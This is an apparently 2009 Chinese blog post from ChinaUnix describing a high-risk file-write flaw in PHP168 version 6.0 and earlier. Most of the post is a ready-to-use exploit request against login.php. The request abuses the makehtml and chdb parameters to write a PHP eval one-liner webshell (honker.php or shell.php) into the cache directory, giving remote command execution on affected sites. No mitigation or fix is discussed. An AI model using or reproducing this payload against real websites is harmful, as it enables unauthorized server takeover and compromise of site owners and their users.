Chinaunix首页 | 论坛 | 博客

渗透

首页 |  博文目录 |  关于我

oma

  • 博客访问: 2284144
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友
最近访客
推荐博文
相关博文
PHP168 6.0及以下版本漏洞

分类: 网络与安全

2009-09-10 00:37:10

危险等级:高

影响版本:PHP168 6.0以下版本

入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。

测试语句:
?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);?

 

--------------------------

login.php

login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=

写到:cache/shell.php ,

阅读(585) | 评论(0) | 转发(0) |
0

上一篇:Discuz! Plugin Crazy Star < = 2.0 Sql injection Vu

下一篇:科学专题——时 间 之 迷

给主人留下些什么吧!~~
关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6